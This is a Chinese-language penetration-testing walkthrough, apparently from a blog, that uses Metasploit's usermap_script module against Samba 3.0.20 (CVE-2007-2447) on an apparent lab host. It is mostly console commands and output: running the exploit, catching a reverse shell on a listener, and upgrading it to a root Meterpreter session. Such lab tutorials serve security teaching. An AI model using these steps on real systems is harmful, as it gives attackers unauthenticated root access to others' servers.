0x04-1 服务器端exploitation-Samba 3.0.20-Debian

侵入一个linux服务器

msf > services -c port,info -p 135,445
Services
========

host            port  info
----            ----  ----
192.168.10.122  135   Microsoft Windows RPC
192.168.10.122  445   Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (workgroup:WORKGROUP )
192.168.10.128  135   Microsoft Windows RPC
192.168.10.128  445   Windows XP SP3 (language:English) (name:DH-CA8822AB9589) (workgroup:WORKGROUP )
192.168.10.254  445   Unix (Samba 3.0.20-Debian)

# 现在192.168.10.254这台服务器
到 https://www.cvedetails.com  查看Samba 3.0.20-Debian有没有对应cve编码
0x04-1 服务器端exploitation-Samba 3.0.20-Debian_第1张图片
# 搜索对应的漏洞利用exploit
msf > search cve:2007 type:exploit samba

Matching Modules
================

   Name                                       Disclosure Date  Rank       Description
   ----                                       ---------------  ----       -----------
   exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/multi/samba/usermap_script         2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    Samba lsa_io_trans_names Heap Overflow


# 选择 rank为excellent,成功率大一些
msf > use exploit/multi/samba/usermap_script 
# 查看该exploit详细的信息
msf exploit(multi/samba/usermap_script) > info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.10.254   yes       The target address
  RPORT  139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

# 设置参数并执行
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP double handler on 192.168.10.115:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EPsE8hpgZPCxacgE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EPsE8hpgZPCxacgE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.115:4444 -> 192.168.10.254:58722) at 2018-12-05 18:09:12 +0800

# 这里就获取了一个session,执行一个命令
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:7f:de:bf  
          inet addr:10.10.10.254  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe7f:debf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:38716 errors:0 dropped:0 overruns:0 frame:0
          TX packets:547 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2543677 (2.4 MB)  TX bytes:72178 (70.4 KB)
          Interrupt:17 Base address:0x2000 

eth1      Link encap:Ethernet  HWaddr 00:0c:29:7f:de:c9  
          inet addr:192.168.10.254  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe7f:dec9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47084 errors:1 dropped:1 overruns:0 frame:0
          TX packets:9312 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3330608 (3.1 MB)  TX bytes:1689578 (1.6 MB)
          Interrupt:18 Base address:0x2080 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4956 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4956 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2376272 (2.2 MB)  TX bytes:2376272 (2.2 MB)

# 退出session,并不是关闭session
Ctrl + Z

^Z
Background session 1? [y/N]  y
msf exploit(multi/samba/usermap_script) > 

# 查看 sessions的使用手册
msf exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C   Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S   Row search filter.
    -c   Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i   Interact with the supplied session ID
    -k   Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n   Name or rename a session by ID
    -q        Quiet mode
    -s   Run a script or module on the session given with -i, or all
    -t   Set a response timeout (default: 15)
    -u   Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

# 直接执行sessions,查看当前所有可使用的sessions
msf exploit(multi/samba/usermap_script) > sessions 

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.115:4444 -> 192.168.10.254:58722 (192.168.10.254)

# 连接一个session
msf exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...

# 关闭session
Crtl + C

^C
Abort session 1? If not, the foreground process in the session will be killed [y/N]  y
""

[*] 192.168.10.254 - Command shell session 1 closed.  Reason: User exit

关于payload

攻击负载
exploit 就像一把钥匙,打开一个门,打开门之后的行为就需要payload

执行 show payload,默认情况msf会自动选择一个payload
Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.115   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

默认使用的是cmd/unix/reverse 就是通过4444端口反弹一个shell,一般情况下这个shell的功能有限,需要将这个shell升级为meterpreter session

# 通过指令升级shell
sessions -u session_id

msf exploit(multi/samba/usermap_script) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.115:4433 
[*] Sending stage (861480 bytes) to 192.168.10.254
[*] Meterpreter session 2 opened (192.168.10.115:4433 -> 192.168.10.254:42658) at 2018-12-05 18:20:07 +0800
[*] Command stager progress: 100.00% (773/773 bytes)

# 查看sessions

msf exploit(multi/samba/usermap_script) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    192.168.10.115:4444 -> 192.168.10.254:39390 (192.168.10.254)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  192.168.10.115:4433 -> 192.168.10.254:42658 (192.168.10.254)

你可能感兴趣的:(0x04-1 服务器端exploitation-Samba 3.0.20-Debian)